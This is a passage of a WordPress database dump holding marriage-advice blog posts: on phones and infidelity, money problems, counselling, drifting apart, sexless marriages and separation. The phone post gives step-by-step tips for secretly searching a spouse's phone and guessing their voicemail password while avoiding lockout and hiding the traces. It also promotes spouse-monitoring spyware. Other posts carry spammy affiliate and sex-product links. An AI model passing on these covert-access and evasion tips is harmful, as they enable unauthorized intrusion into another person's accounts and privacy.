be itemized. Great! I would have thought modern technology would be on my side, but it wasn’t. Text messages proved to be the biggest secret weapon in his marital misconduct.</p>\n<p>I learned quite a bit during my lonely and bitter period of self-pity. I won’t bore anyone or fuel the gossip line with juicy details, but I will share a few tips I discovered during my heartbreaking experience.</p>\n<p>Analyzed cell phone bills to create a timeline. The frequency and volume of calls during a specific time of day can show when your spouse has more time on their hands than you know. Good tip is to call during this time frame. Also look for a period during the day where there is a large time span between phone calls.</p>\n<p>The first call after this dead time maybe the call after the ‘meeting’.</p>\n<blockquote class=\"right\"><p>“I  am currently a deployed soldier. My intentions with this program was to  make sure my wife wasn’t cheating on me. I have come to find out,she is”<a rel=\"external nofollow\" href=\"../go/acespy/\">AceSpy</a></p></blockquote>\n<p>If you get a chance pilfer through your spouse’s cell phone. You can learn so much by doing so. Check incoming and outgoing calls. Don’t forget the missed calls. Also check text messages sent, received and saved. If you find that calls or text messages have been deleted don’t fret.</p>\n<p>There are other things you can check. Check Canned Messages or similar pre-made messages that can be created on a cell phone and save so that words do not have to be keyed in when sending a text message. Lazy, but it’s easy. Don’t forget to check the phone book.</p>\n<p>One of the coolest functions I found during my plight is Voice Memos. Several mobile phones have this function and I found numerous saved voice memos on my husband’s phone and my own phone. I’m assuming these were saved on my own phone while I was trying to adjust the volume during different conversations and hit the memo button by accident.</p>\n<p>The mobile phones we have only record the other party’s conversation but that was enough for my marital misconduct argument with my husband.</p>\n<p>Another thing that I did was figure out my husband’s password to his voice mail. Evil I know, but I couldn’t help myself. I figured that after living with this man for over a decade I could crack his code. I was successful but it definitely took time. I waited until he was home and his cell phone was turned off.</p>\n<p>During each call to his voice mail I would only attempt access two times. I was afraid a third attempt would block his access to his voice mail and he would have to call customer service, which would unveil my sneaky side. If you do go this route and crack the code remember that when you listen to a message it will no longer be an unheard message.</p>\n<p>So you have a major dilemma, delete the message or let your spouse hear a recording that says something to the effect of you have one old message. That is a very difficult decision. You are either going to have to delete important messages or risk the chance of being discovered. Whether your spouse suspects you or not, I guarantee the password will change very quickly.</p>\n<p>Also, don’t forget to dial a different number afterwards if your phone has redial that shows the number you called. You don’t want your spouse to see their cell phone number and password on the screen. Which brings me to another tip. It definitely pays off to hit redial on your home phone from time to time.</p>\n<p>Caller ID’s are a wonderful tool. Of course they can be deleted, but how many Caller ID’s do you have in the house? Check all of them. I found that my satellite television had Caller ID because it was plugged into a phone jack. Fantastic tool.</p>\n<blockquote class=\"right\"><p>As seen on CHEATERS</p>\n<p>You’ve seen the TV Show. When the show ends, it asks its viewers to visit their website. And what software do you see them promoting? That’s right, <a rel=\"external nofollow\" href=\"../go/pcpandora/\">PC Pandora!</a></p></blockquote>\n<p>You have to appreciate modern technology. Not only does it make our lives easier but it also makes marital misconduct easier. Pre-paid mobile phones. How clever. Who would have thought? No bills, no nothing. The perfect tool for concealing those ‘special calls.’ Watch for mailings from different cell phone companies other than your current provider that offer incentives to Preferred Customers. NOTE:</p>\n<p>Some companies do send out mass mailings in hopes of gaining new customers and these companies will use different ploys to attract new customers. So if you do receive something from a different cell phone provider call the company first and inquire on their mailing before jumping to conclusions.</p>\n<p>Hang-up calls or anonymous calls to your home number maybe something you need to pay attention to. Don’t jump to conclusions again, but pay attention. You can block anonymous calls to your home. Most local phone services providers offer this option and you can call them and inquire about this feature.</p>\n<p>Most of the time it’s done by entering a code on your home phone and can be undone by entering a different sequence using your keypad on your phone.</p>\n<p>Everything I have mentioned takes time. I did not accomplish everything in a day or two; it actually took months for me to catch on and make my discoveries. I would not have put myself in harms way if I feared my spouse and I do not recommend anyone doing anything that would put you in danger or risk of being physically hurt. Seek help.</p>\n<p>Modern technology is awesome. It makes our lives easier and more interesting. It’s a shame that it tempts us to be unfaithful, but it’s so easy and convenient. It also appears to be fun and intriguing.</p>\n<p>What can we do? Destroy the cell phone?</p>\n<p>mobile phones have become an important part of our lives and many of us feel so lost if we don’t have a cell phone attached to our hip or in our purses. Don’t blame the cell phone.</p>\n<p>Take a look at your relationship and be honest with yourself. Where did it go wrong? It didn’t happen overnight. A quick fix isn’t going to help a relationship that took months or years to fall apart.</p>\n<p>No matter what you do just remember there is no easy way to get through the devastation of marital misconduct, but with time things will get easier. The trust you had has been destroyed and whether you are headed for divorce or trying to work things out, it all takes time.</p>\n<p>It’s so easy to let a marriage fall into a rut and become routine. When that happens it’s easy to take advantage of each other and lose the respect that once was there. To make a marriage work both spouses have to make sacrifices and spend quality time together instead of just existing together. Communication is so important. Not just the casual conversations about how the day went, but really talk and listen to each other.</p>\n<p>And, if you decide to try to  after discovering marital misconduct I sincerely hope that you and your spouse find that special feeling again, and that’s love.</p>\n<p> </p></div>\n			</div>\n		</div>','Are mobile phones to blame for marriage problems?','Remember that day so long ago when you said, \"I do\". There was no doubt in your mind at that very moment that you were in for the long haul and never thoug','publish','open','open','','are-cell-phones-to-blame-for-marital-misconduct','','','2017-10-04 10:12:45','2017-10-04 10:12:45','',0,'http://www.bournesociety.org.uk/are-cell-phones-to-blame-for-marital-misconduct',0,'post','',0),(42,1,'2017-10-04 09:15:09','2017-10-04 09:15:09','<div id=\"content\" class=\"hfeed\">	\r\n		\r\n		\r\n	<div class=\"post-233 post type-post status-publish format-standard hentry category-marriage tag-control-freak tag-marriage tag-marriage-problems tag-money-problems\">\r\n	\r\n				<h1 class=\"entry-title\">Are Money Problems Pulling Your Marriage Apart?</h1>\r\n\r\n		<div class=\"byline-meta\"/>		\r\n				<div class=\"entry-content\">\r\n		<p><em><strong>Money problems</strong></em> are one of the main reasons a marriage can get into trouble. It is hard to keep a marriage happy when all you seem to think about is how to pay the bills and keep a roof over your head. That\'s why is great when you can find someone with the same mindset as you and you manage finances similarly. You may want to <a href=\"https://www.wedfrugal.com/how-couples-can-be-compatible-with-finances/\">consider reading this</a> article to understand more about finances and compatibility.<span id=\"more-233\"/></p>\r\n<p>However, you can be happy without being wealthy as long as you manage the financial side of your marriage sensibly and don\'t get into debt for things you don\'t really need. Arguments over <span style=\"text-decoration:underline;\">money problems</span> between husband and wife are often caused not by a lack of money but how one of the marriage partners spends it.</p>\r\n<p>The sad fact is that money to some people is there to be spent no matter what the circumstances. They have no thought of tomorrow and need constant gratification in the form of spending. They are wasteful with money and buy things that are not really needed. In fact, spending money is like an addiction to some people as gambling is to others.</p>\r\n<p>To many, spending all of this money will feel like a good idea at the time, but how many will come to regret it when they have no money left over for anything else? Unfortunately, this is the harsh reality for some people and it is very likely that their loved ones are left with the repercussions. </p>\r\n<p>You don\'t have to deal with this alone though, as there are many people who are on hand to help individuals who have found themselves in a financial crisis. For example, financial advisors, who may have marketed themselves with the help of somewhere like <a href=\"https://www.leadjig.com/financial-seminar-marketing/\">LeadJig</a>, work very hard to put a suitable financial plan in place to help with your future expenses, in order to make sure that you don\'t fall into this trap again. </p>\r\n<p>But what happens when it\'s too late? </p> \r\n<h2><em>Marriage and debt problems.</em></h2>\r\n<p>When money is short, the reckless partner often <a href=\"http://www.moneysavingexpert.com/banking/interest-rates\" target=\"_blank\" rel=\"nofollow\">borrows money at high rates</a> for non-essentials because they want something and simply do not think or even care about how much it will cost them. They rack up massive credit card debts. They want something, they want it now, and nobody is going to stop them.The reckless spender is like a gambler who goes on tilt when he is losing, out of control and emotionally driven.</p>\r\n<p>A financially inept partner will also get high-interest loans that they really can\'t afford because they haven\'t planned for the inevitable money emergencies that crop up now and then. Paying high interest on loans will only increase the debt and it can rapidly become a mountain that will never be reduced.</p>\r\n<p>Bad financial management like this in a marriage has a habit of developing into a major cause of trouble between husband and wife. The fact is, some people just don\'t know how to manage money properly and this eventually causes all sorts of problems for the marriage. Mounting debt problems cause lots of stress and marital discord.</p>\r\n<p>When one partner is haphazard with finances and the other one is more sensible then the difference in the way they handle money comes to the fore and causes trouble for the marriage.</p>\r\n<p>The partner who is more careful with money sees their spouse wasting money and running up debts all over the place. However, when he or she tries to talk about the money problems they get called a miser just for trying to bring their finances back under control. Not being able to talk frankly about <a href=\"http://marriage.about.com/od/finances/a/financialuncert.htm\" target=\"_blank\" rel=\"nofollow\">financial problems</a> with your spouse can cause simmering tensions that will eventually explode into an argument.</p>\r\n<h2><strong><br/></strong><em>Money as a source of control in a marriage.</em></h2>\r\n<p>They say having control of the money is like having power and one of the partners often takes charge of the finances as a source of control in the marriage. In fact, this is a favourite tactic of a control freak. Holding the purse strings in a marriage is one of the many ways they exert control over their partner. They dictate how the money is to be spent and won\'t allow any say in the matter.<br/>\r\n.<br/>\r\nThe problem with this is that when one partner handles all the finances without letting their spouse have a say about it then conflict is almost inevitable. Where money is concerned, both partners should contribute when it is affecting their marriage negatively.</p>\r\n<h3><em><strong>Conclusion:</strong></em></h3>\r\n<p>There is no doubt that <a href=\"http://www.supportline.org.uk/problems/debt.php\" target=\"_blank\" rel=\"nofollow\">money problems</a> can make for a troubled marriage and when this is a result of the behaviour of one of the partners this has to be changed before it brings the marriage to its knees, both financially and emotionally. It may not be easy to do this, but it has to be done because, like an <a href=\"http://forums.moneysavingexpert.com/showthread.php?t=1095701\" target=\"_blank\" rel=\"nofollow\">unpaid debt</a>, the problem will only get bigger as time goes by.</p>\r\n<p>-–			  </p>\r\n			  </div>\r\n	</div>\r\n			      </div>','It\'s no secret that money problems can pull your marriage apart','Money problems are one of the main reasons a marriage can get into trouble. It is hard to keep a happy marriage when all you seem to think about is how to pay the bills and keep a roof over your head.','publish','open','open','','money-problems-pulling-your-marriage-apart','','','2017-10-04 10:11:18','2017-10-04 10:11:18','',0,'http://www.bournesociety.org.uk/money-problems-pulling-your-marriage-apart',0,'post','',0),(43,1,'2017-10-04 09:15:25','2017-10-04 09:15:25','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1257 post type-post status-publish format-standard hentry category-marriage tag-communication tag-counselor tag-help tag-make tag-marital-problems tag-marriage-counselling tag-marriage-help tag-marriage-issues tag-marriage-problems post_box top\" id=\"post-1257\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Are You Considering Marriage Counselling For Your Marriage Problems?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>Couples who are having marriage problems may be considering seeing a marriage counselor but are worried about what to expect.  After all, it’s not easy to talk to a complete stranger about your hurt feelings and all the things that have made both partners unhappy.</p>\n<p>It’s even more difficult to change the behaviours that caused the unhappiness.  However, by the time most couples decide to seek marriage counselling, the problems in their marriage have usually left them in too much distress to deal with it them themselves.<span id=\"more-1257\"></span> </p>\n<p>Some couples are worried that the issues that they must discuss with a marriage counsellor might be too painful, but a good marriage counsellor can help steer a couple toward the type of solutions that can resolve issues in a positive and constructive manner.</p>\n<p>Marriage counselling works by addressing the underlying marital problems, and separating the hurt and anger from the actual issues. The couple is encouraged to express their feelings both together and individually in a constructive way. Usually, when a couple fights, they have a tendency to lash out in ways that are intended to hurt or control each other, which only leads to more problems. </p>\n<p>It is very hard to deal with marriage issues when the causes of the underlying problems are not even recognized.  A good marriage counselor will help to bring the underlying issues out in the open and help couples understand what caused the problems in the first place.  The benefits of marriage counseling cannot be overstated, as it can put marital problems in perspective, and make them seem less overwhelming.  </p>\n<p>When couples are in marriage counseling, they are encouraged, with the guidance of the counsellor, to discuss their true feelings without fear of retribution or humiliation. Talking about your feelings can go a long way in helping a couple begin the task of repairing the damage in their marriage that has been building up over time.</p>\n<p>It’s not easy to discuss your innermost feelings to a complete stranger but it may be the only course of action left if you want to .  </p>\n<p>Marriage counsellors are not the miracle workers some people think they are. What they do is facilitate communication between the wife and the husband so that marital issues can be resolved if that is what the couple really wants.</p>\n<p>Marriage counselling does not work in many difficult cases but may be worth a try if it helps to .</p>					<p class=\"post_tags\"> </p></div>\n			</div>\n		</div>','Have you ever considered marriage counselling for your problems?','Couples who are having marriage problems may be considering seeing a marriage counselor but are worried about what to expect.  After all, it’s not easy to talk to a complete stranger about your hurt feelings and all the things that have made both partners unhappy.','publish','open','open','','considering-marriage-counselling-for-your-marriage-problems','','','2017-10-04 10:10:59','2017-10-04 10:10:59','',0,'http://www.bournesociety.org.uk/considering-marriage-counselling-for-your-marriage-problems',0,'post','',0),(44,1,'2017-10-04 09:15:37','2017-10-04 09:15:37','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1030 post type-post status-publish format-standard hentry category-marriage tag-closeness tag-conflict tag-counselor tag-marriage tag-relationship tag-romance tag-sexless-marriage post_box top\" id=\"post-1030\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Are you drifting apart from your spouse?</h1>\n					<p class=\"headline_meta\"> </p>\n				</div>\n				<div class=\"format_text entry-content\">\n<p>Get the feeling you are drifting apart from your spouse? You can rescue the relationship with a little renewed love and attention toward one another, like when you first married. Can you remember how great your marriage was back then?  If you can’t then get out your wedding photos to remind yourself of how happy you once were. You can be like that again.</p>\n<p>Sadly, in most marriages, the initial excitement of newlyweds starts to wear off over the years due to the stresses of everyday life. </p>\n<p>Eventually you start to drift apart…<span id=\"more-1030\"></span></p>\n<p><strong>Two reasons why you grow apart.</strong></p>\n<p>If you are the husband then you may work so hard and for so many hours that you are hardly at home to pay attention to your wife, which can make her feel you aren’t there for her any more. </p>\n<p>You may be satisfying her financial needs but you aren’t satisfying your wife’s emotional needs. The danger is she might start to look elsewhere to satisfy them.</p>\n<p>Or maybe you are constantly there for your wife but she is so busy running the household and looking after the kids that she doesn’t pay attention to your emotional needs any more. Men have emotional needs too, don’t they? Of course they do.</p>\n<p>What it all boils down to is that each of you is so busy with the everyday stuff of married life that you are slowly but surely drifting apart. You have become emotionally distant to each other and are no longer communicating.A lack of communication is one of the issues in marriage that you need to deal with. If you can’t talk to you spouse how can you tell them how you truly feel?</p>\n<p>If it goes on for any length of time you will become strangers in your own home and the marriage is in danger of breaking down from a lack of closeness. It can get so bad you may even end up in a <a href=\"../category/all-articles/marriage/sexless-marriages/\">sexless marriage</a>. If not due to health problems, then a lack of sex in a marriage is a sure sign of deep relationship issues between husband and wife.</p>\n<p><strong>Talk over problems in your marriage</strong></p>\n<p>Even the best marriages never run smoothly all the time and you have to be ready to knuckle down when problems arise. When they do remember to think carefully before you speak, and never get angry or you will make things worse.</p>\n<p>A small problem in your marriage can develop into a major source of conflict if you leave it festering for too long so talk about it with your spouse before it gets out of hand.</p>\n<p>If you feel emotionally distant and find it hard to talk about marriage problems with your spouse then you might need to see a marriage counselor to help you . While talking over marital difficulties is a great help, both of you need to do something to solve them.</p>\n<p><strong>Marriage is an ongoing commitment.</strong></p>\n<p>Many people stay in a marriage just because of the children. But that is not a good enough reason even though there are many side effects of divorce on children. Saving a marriage starts with a commitment by both parties that the marriage is worth saving. </p>\n<p>A truly strong marriage is based on a never-ending commitment to each other, which means you have to work constantly on your marriage to stop it breaking down. If, for example, you don’t spend enough time together any more, plan a night out every week without the kids.</p>\n<p>And when you are together try some imaginative, romantic ways to spend that precious time. Don’t do the same old thing every week. Mix it up a bit to keep it exciting. There’s nothing quite like a bit of romance to lift a stale marriage out of the doldrums.</p>\n<p>If you really want to bring back the love in your marriage it won’t happen without a bit of effort from at least one, and preferably both of you. You can renew the love if you try hard enough.</p>\n<p>If only one of you is committed to making your marriage work, it’s a lot more difficult but even so there are ways to overcome your spouse’s lack of commitment if you have the right advice</p>\n<p>If you want really practical marriage advice we highly recommend Save My Marriage Today. A guide that has helped thousands of married couples restore their relationship and save their marriage. </p>\n<p> </p></div>\n			</div>\n		</div>','How to know if you are drifting away from your spouse','Get the feeling you are drifting apart from your spouse? You can rescue the relationship with a little renewed love and attention toward one another, like','publish','open','open','','are-you-drifting-apart-from-your-spouse-save-your-marriage','','','2017-10-04 10:10:33','2017-10-04 10:10:33','',0,'http://www.bournesociety.org.uk/are-you-drifting-apart-from-your-spouse-save-your-marriage',0,'post','',0),(45,1,'2017-10-04 09:15:56','2017-10-04 09:15:56','<div id=\"content\" class=\"hfeed\">\r\n\r\n			<div class=\"post-18 post type-post status-publish format-standard hentry category-sexless-marriages tag-love tag-relationship tag-sexless tag-sexless-marriage post_box top\" id=\"post-18\">\r\n				<div class=\"headline_area\">\r\n					<h1 class=\"entry-title\">Are you in a sexless loveless marriage?</h1>\r\n					<p class=\"headline_meta\">  </p>\r\n				</div>\r\n				<div class=\"format_text entry-content\">\r\n<p><span class=\"drop_cap\">H</span>ere is the issue that separates that which might be tolerable, from that which is not tolerable. Sexless is one thing; loveless is another.</p>\r\n<p>A sexless relationship has its own problems, as you probably know. If there is love between you then the absence of sex might be tolerable. Along with love there might well be a shared history, lots of common family and friends, and the normal attachments to home and community.<span id=\"more-18\"></span></p>\r\n<h3>But when the love is gone, what is left?</h3>\r\n<p>Not much but a lot of emptiness.</p>\r\n<p>I have a book in my office and the title is Love is a Choice. I loaned the book to a client a couple of weeks ago because he was in great turmoil. His relationship had been basically sexless for some months. His girlfriend had parted the relationship. He knew that he had remained at a safe distance from her, fearful of intimate sexual contact. She grew tired of the lack of sex, but even more importantly, she grew weary of the <a href=\"../get-him-in-the-mood-review/\">lack of intimacy</a>. She wanted someone to treat her lovingly. For her, sex and love were two different, but tightly related experiences. She wanted them both.</p>\r\n<p>Love is a choice. If you want to feel love for your partner, then act lovingly and you will begin to think lovingly toward your partner. Those loving actions and thoughts will bring about loving feelings.</p>\r\n<h3>Act, think, feel  in that order.</h3>\r\n<p>If you want to change the way you feel, first change the way you act, then work hard and change the way you think and your feelings will change as well.</p>\r\n<p>So, if you find yourself <a href=\"../get-him-in-the-mood-review/\">in a sexless marriage</a> and it is becoming loveless as well, and then begins to act lovingly so that you can begin to think lovingly and the feelings will come around.</p>\r\n<p>Sexless and loveless relationships offer very little of depth to someone\'s life. If this is the sort of relationship you are in, then do what you can to act, think, and feel differently.</p>\r\n<p>If you can get the love going then the sex might follow. But, if you can get the sex going the love might follow. </p>\r\n<p>One of the major pieces of advice that some professionals offer to sexless couples is this: Just do it! The thought is that if you just act sexually, then your desire for sex will increase. There is some sound reasoning behind this advice. If you will just do it then you will get into the habit of doing it more. </p>\r\n\r\n<p>To spice up your conjugal life, you could try something different than you usually do. There are a few <a href=\"https://cumswingwithme.com/blogs/news/cheap-sex-swings\">things to consider</a> when you want to bring the spark back to your sex life like sex furniture, toys, or even different positions! Dildos, cock rings, vibrators, butt plugs, are some of the things you could consider while trying to bring back the thrill to your conjugal life. A threesome with <a href=\"https://www.ovdoll.com/p/realistic-sex-dolls/\">realistic sex dolls</a> is another territory you could foray into if you feel that it could do something for your and your partner\'s sexual pleasure and your sex life as a cumulative. </p>\r\n\r\n<p>But, if after a lot of work and energy, you are stuck in a sexless loveless marriage it might be time to contemplate ending the relationship.</p>\r\n<p>Sex and love.</p>\r\n<p>   </p>\r\n			  </div>\r\n			</div>\r\n		</div>','Are you in a sexless loveless marriage?','Sexless and loveless relationships offer very little of depth to someone’s life. If this is the sort of relationship you are in, then do what you can to act, think, and feel differently.','publish','open','open','','are-you-in-a-sexless-loveless-marriage','','','2017-10-04 09:15:56','2017-10-04 09:15:56','',0,'http://www.bournesociety.org.uk/are-you-in-a-sexless-loveless-marriage',0,'post','',0),(46,1,'2017-10-04 09:16:16','2017-10-04 09:16:16','<div id=\"content\" class=\"hfeed\">\r\n\r\n<div id=\"fb-root\"></div>\r\n					<script type=\"text/javascript\"><![CDATA[\r\n						window.fbAsyncInit = function()\r\n						{\r\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\r\n						};\r\n						(function()\r\n						{\r\n							var e = document.createElement(\'script\'); e.async = true;\r\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\r\n							document.getElementById(\'fb-root\').appendChild(e);\r\n						}());\r\n					]]></script><div class=\"post-1858 post type-post status-publish format-standard hentry category-marriage tag-financial-help tag-financial-liability tag-happiness tag-love-and-money tag-marriage tag-true-love post_box top\" id=\"post-1858\">\r\n				<div class=\"headline_area\">\r\n					<h1 class=\"entry-title\">Are You Viewing Marriage As A Financial Liability?				</h1>\r\n				</div>\r\n				<div class=\"format_text entry-content\">\r\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/are-you-viewing-marriage-as-a-financial-liability/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"></div>\r\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&style=normal&hashtags=Financial+Help,Financial+Liability,Happiness,Love+And+Money,Marriage,True+Love&b=2\" href=\"../are-you-viewing-marriage-as-a-financial-liability/\"></a></div>\r\n<p>Yes, it has become acceptable in this modern society to look at marriage as an investment. Marriage is now viewed as either an asset or a liability. People who are more conscious of their financial well-being are asking all the possible risks before they marry.</p>\r\n<p>And to others, love still prevails; they put all financial questions aside as they dive into marriage with full hope and trust that everything will work out fine. How about you? What is your view on marriage? Does it really matter if it\'s a financial help or trap?<span id=\"more-1858\"></span></p>\r\n<p>In the olden days, marriage is as easy as asking whether or not you love the person enough to be linked to him or her, until death do you part. With today\'s living complexities, however, it has evolved to another level of union – that is, for love and money. There are so many things to tackle when discussing marriage and finances. It involves different areas in people\'s lives, such as their values, beliefs, goals, and other things, like sensitive subjects that weren\'t normally discussed before.</p>\r\n<p>So how is it really? Are you viewing your marriage as a <strong>financial liability</strong>? Ask yourself these questions.</p>\r\n<p><strong>Is it true love?</strong></p>\r\n<p>You may think that it\'s silly to ask, but, it isn\'t. Sometimes security and comfort is being confused by people with love. When your spouse can provide the material things to make your life comfortable, you associate this with generosity, kindness, and happiness. Sometimes it is all that, but other times, it isn\'t.</p>\r\n<p>Love goes beyond the material gains, meaning even if your spouse is poor, you will bear with him or her and see it through together. If you cannot be with your spouse because he or she has failed to provide, or has become a financial burden, then it is your mind that is working, not your heart.</p>\r\n<p>Which do you think is more important, money or love?</p>\r\n<p>Ok, it sounds like another silly question, but think about it. Money and love go hand in hand in almost all aspects of daily living. They are both important in every person\'s life, maybe at different levels, but equally important. Whether we like it or not, Money makes the world go round, just as much as love does.</p>\r\n<p>You cannot continue loving without money to feed you, keep you living like you do. A long time ago, it may have been easy to live without money, but in today\'s age, this is nearly impossible. If you were given a choice, which would you choose? Which would you prioritize?<br /><strong><br />\r\nWhat do you think your life would be like after marriage?</strong></p>\r\n<p>Or if you\'re married, is your marriage anything like you\'ve imagined before? Marriage means that you\'ve allowed almost everything in your life to be shared with one person. This include problems, decisions, joy, sorrow, and any amount of freedom you enjoy.</p>\r\n<p>But people, by nature or by upbringing, are fairly different in some thins, and this include spending habits. If both parties do not agree, an argument usually ensues. As a result, it can cause immense strain.</p>\r\n<p>If you are a single person, you may either feel terrified to get married, or excited to be. One thing\'s for sure though, that you\'ve thought of how your financial life would be like, when or if, you are married. You may be hesitant because you know that many marriages ended up in divorce when their financial responsibilities were already too much to bear.And you may be excited about it because being married may be connected with lower cost of living, and financial strength.</p>\r\n<p>Have you weighed the advantages and disadvantages of being married?</p>\r\n<p>Sometimes the thought of marriage can overwhelm a person when they know the financial liabilities that would come with it.</p>\r\n<p><strong>What are the disadvantages?</strong></p>\r\n<p>First will be the cost of the wedding. Some couple brings debt into their marriage because of holding an extravagant wedding that they can\'t actually afford. After a few years, they will have to worry about the cost of raising children. The expenses for an infant are so expensive that some couples opt to have only one child.</p>\r\n<p>If they think raising kids are expensive, wait until they grow up and go to college. And then, Married couples usually have higher taxes because your incomes are seen as once income, and a higher income tax bracket is set upon you.</p>\r\n<p><strong>What are the advantages?</strong></p>\r\n<p>There is strength in numbers; two heads working for a single goal are better than one. Being married entitles you to have a supporter no matter what financial situation you are in- this is if your spouse is truly concerned about your well-being.</p>\r\n<p>Spouses also don\'t pay estate tax, which ultimately means that you don\'t have to pay a tax on your right to transfer property at your death (learn more here - <a href=\"https://www.cunninghamlegal.com/new-california-estate-tax-proposed-for-2020/\">https://www.cunninghamlegal.com/new-california-estate-tax-proposed-for-2020/</a>). As well as this, gifts between spouses aren\'t subject to gift tax. You\'ll have the ability to share deductions for kids, mortgage payments, and other aspects of a married life, such as sharing a home and utilities.</p>\r\n<p>   </p>\r\n				</div>\r\n								</div>\r\n		</div>','Marriage - is it A Financial Liability?','','publish','open','open','','marriage-as-a-financial-liability','','','2017-10-04 10:10:09','2017-10-04 10:10:09','',0,'http://www.bournesociety.org.uk/marriage-as-a-financial-liability',0,'post','',0),(47,1,'2017-10-04 09:18:22','2017-10-04 09:18:22','<div id=\"content\" class=\"hfeed\">\n\n<div id=\"fb-root\"></div>\n					<script type=\"text/javascript\"><![CDATA[\n						window.fbAsyncInit = function()\n						{\n							FB.init({appId: null, status: true, cookie: true, xfbml: true});\n						};\n						(function()\n						{\n							var e = document.createElement(\'script\'); e.async = true;\n							e.src = document.location.protocol + \'//connect.facebook.net/en_US/all.js\';\n							document.getElementById(\'fb-root\').appendChild(e);\n						}());\n					]]></script><div class=\"post-70 post type-post status-publish format-standard hentry category-marriage tag-keep-your-marriage tag-nancy-wasson post_box top\" id=\"post-70\">\n				<div class=\"headline_area\">\n					<h1 class=\"entry-title\">Can a Marriage Separation Ever Save a Marriage?				</h1>\n				</div>\n				<div class=\"format_text entry-content\">\n<div class=\"wpfblike\" style=\"height: 40px;\"><like href=\"http://saveyourmarriage.co.uk/can-a-marriage-separation-ever-save-a-marriage/\" layout=\"default\" show_faces=\"false\" width=\"400\" action=\"like\" colorscheme=\"light\" send=\"true\"></like></div><div class=\"twitter_button\" style=\"float: right; margin-left: 10px;\"><iframe src=\"http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fsaveyourmarriage.co.uk%2Fcan-a-marriage-separation-ever-save-a-marriage%2F&amp;count=vertical&amp;lang=en\" height=\"62\" width=\"55\" frameborder=\"0\" scrolling=\"no\" allowtransparency=\"true\"></iframe></div>\n<div class=\"tweetmeme_button\" style=\"float: right; margin-left: 10px;\"><a class=\"tm_button\" rel=\"&amp;style=normal&amp;hashtags=Keep+Your+Marriage,Nancy+Wasson&amp;b=2\" href=\"../can-a-marriage-separation-ever-save-a-marriage/\"></a></div>\n<p>As an experienced counselor, one of the questions I’m asked frequently is, Can a marriage separation ever save a marital relationship? My answer is a qualified yes.</p>\n<p>Sometimes a couple is miserable living together and can’t seem to co-exist without having constant harping and bickering. If they have children, they may worry about the impact on them of all the fighting. Each spouse wants the marriage to work and is willing to work on the problems and issues in marriage counseling while they’re separated.<span id=\"more-70\"></span></p>\n<p>Couples in this situation often plan to use the separation period to let the dust settle, reflect on the marriage, take responsibility for their share of what has happened, and work on individual and joint issues in counseling. One goal is for the spouses to use their problem-solving skills in counseling to address and resolve the most serious problems before moving back together. Both spouses agree not to date anyone else and to focus exclusively on working to improve the marriage.</p>\n<p>For these couples, the marriage separation can be a time to think, to reflect, to analyze, to cool off and calm down, and to take a break from each other. It also provides time and space for each spouse to make unhurried, thoughtful decisions instead of waiting for things to blow up and then impulsively leaving. Used in this way, a planned separation can actually help to save a marriage.</p>\n<p>In other cases, one spouse or the other may move out on the spur of the moment after an upsetting argument. The separation is unplanned, and there are no plans for marriage counseling, no guidelines agreed upon about seeing others, and no tentative time-line for the separation.</p>\n<p>There is usually much anxiety on the part of the partner who has been left unexpectedly and there are many unanswered questions: What is happening? Will the partner file for divorce? Will the marriage survive? Whether the separation will help or hurt the marriage is unknown in this case. Things could go either way, depending on what happens.</p>\n<blockquote class=\"right\"><p> </p></blockquote>\n<p>Another situation that can result in separation is when a spouse is living in an intolerable situation in the marriage. Perhaps the partner is verbally abusive, chronically runs around, or shows continual disrespect towards his or her spouse in some other way. The spouse may have tried to get the partner to go to counseling, but the partner always refused.</p>\n<p>Sometimes the best thing the spouse can do is to decide to separate and hope that the partner will be shocked enough by the unexpected action to finally agree to work on the marriage. In situations like this, a separation can sometimes save the marriage.</p>\n<p>The partner often says, I knew we had some problems, but I didn’t think they were that serious. I never thought she (or he) would really leave. She kept telling me, but I didn’t believe her. The spouse then has to stand firm and let the partner know that she is going to live separately because I refuse to be in a marriage where I’m treated like this. I deserve more.</p>\n<p>By not rushing to file for divorce, the spouse finds out during the planned separation if the partner is finally motivated enough to enter counseling and work on changing. If the couple enters counseling, the therapist will then be able to give them a recommendation about when they are ready to live together again, if ever.</p>\n<p>Of course, there are no guarantees in a marriage separation. The separation might be instrumental in saving the marriage, or it may widen the gap between the two spouses and eventually lead to divorce. A planned separation is always preferable to an impulsive one.</p>\n<p>The following five tips can help you if you need to think about separating from your spouse:</p>\n<p>1. Talk with your spouse about what your individual goals are for the separation. Are they the same or different?</p>\n<p>2. Try to reach agreement that neither of you will date anyone else during this period of time. If your marriage is going to have the best chance possible, you’ll want to agree not to have sexual entanglements with others so you can continue to work on your relationship.</p>\n<p>3. Set a tentative time period for the separation, such as three months. At the end of that time, you can both re-evaluate the decision in terms of what’s best for each of you.</p>\n<p>4. Agree to seek individual and joint counseling during the separation to address the key problems and issues that have caused conflict in the marriage. This is an ideal time to do some deep individual work on your own personal issues as well as to address core relationship issues.</p>\n<p>5. Set guidelines that you both agree to about how much contact you’ll have during the separation and what kind of contact it will be. It doesn’t do any good to have a separation if one spouse or the other is calling on the phone every five minutes and constantly wanting to talk more about the problems. The separation is supposed to reduce conflict and give each person some space and relief from constant pressure and arguments.</p>\n<p class=\"alert\">  </p>\n				</div>\n								</div>\n		</div>','Can a Marriage Separation Save a Marriage? Check out our opinions','','publish','open','open','','can-a-marriage-separation-save-a-marriage','','','2017-10-04 09:44:44','2017-10-04 09:44:44','',0,'http://www.bournesociety.org.uk/can-a-marriage-separation-save-a-marriage',0,'post','',0),(48,1,'2017-10-04 09:07:08','2017-10-04 09:07:08','<div id=\"content\" class=\"hfeed\">\n\n			<div class=\"post-1647 post type-post status-publish format-standard hentry category-affairs tag-affair tag-anger tag-anxiety tag-how-to-survive-an-affair 